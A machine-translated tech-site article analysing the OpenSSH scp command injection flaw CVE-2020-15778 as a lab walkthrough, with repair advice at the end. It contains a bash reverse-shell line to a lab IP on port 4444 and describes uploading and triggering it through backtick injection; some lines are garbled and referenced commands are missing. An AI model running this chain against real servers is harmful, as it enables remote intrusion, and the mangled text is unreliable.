In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-10-14 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
This article mainly introduces the example analysis of OpenSSH command injection vulnerability, the article is very detailed, has a certain reference value, interested friends must read it!
Vulnerability description
Vulnerability number: CVE-2020-15778
SCP (secure copy) is a program that copies files between two computers, using the ssh protocol. It is included by default in most linux and unix distributions. The program is implemented by scp.c of openssh and other related codes.
The root cause of the vulnerability is that remote command parameters are not properly filtered somewhere in the scp.c file, resulting in remote execution of arbitrary commands. Detailed analysis, read on.
Utilization condition
1. Target server openssh version & / dev/tcp/192.168.110.128/4444 0 > & 1
The bounce shell command is parsed as follows:
The command states that bash-I generates an interactive bash > & / dev/tcp/192.168.110.128/4444 to establish a TCP connection and redirects standard output and errors to the TCP connection 0 > & 1 to get input from the TCP connection
Transfer the kali.sh file remotely to the specified directory in centos through the scp command:
The transferred kali.sh file can be found in centos:
Listen on port 4444 on kali:
Execute the following poc to execute the uploaded bounce shell:
You can observe that kali has successfully connected to centos:
In linux, the contents of the backquotes will be executed as shell commands. Note that backquotes are used in poc, not single quotes.
Vulnerability repair
1. Update openssh to the latest version
two。 Disable scp
3. Ensure the security of ssh passwords to prevent them from being compromised or violently cracked
The above is all the contents of the article "sample Analysis of OpenSSH Command injection vulnerabilities". Thank you for reading! Hope to share the content to help you, more related knowledge, welcome to follow the industry information channel!
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
The market share of Chrome browser on the desktop has exceeded 70%, and users are complaining about
The world's first 2nm mobile chip: Samsung Exynos 2600 is ready for mass production.According to a r
A US federal judge has ruled that Google can keep its Chrome browser, but it will be prohibited from
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
About us Contact us Product review car news thenatureplanet
More Form oMedia: AutoTimes. Bestcoffee. SL News. Jarebook. Coffee Hunters. Sundaily. Modezone. NNB. Coffee. Game News. FrontStreet. GGAMEN
© 2024 shulou.com SLNews company. All rights reserved.
12
Report
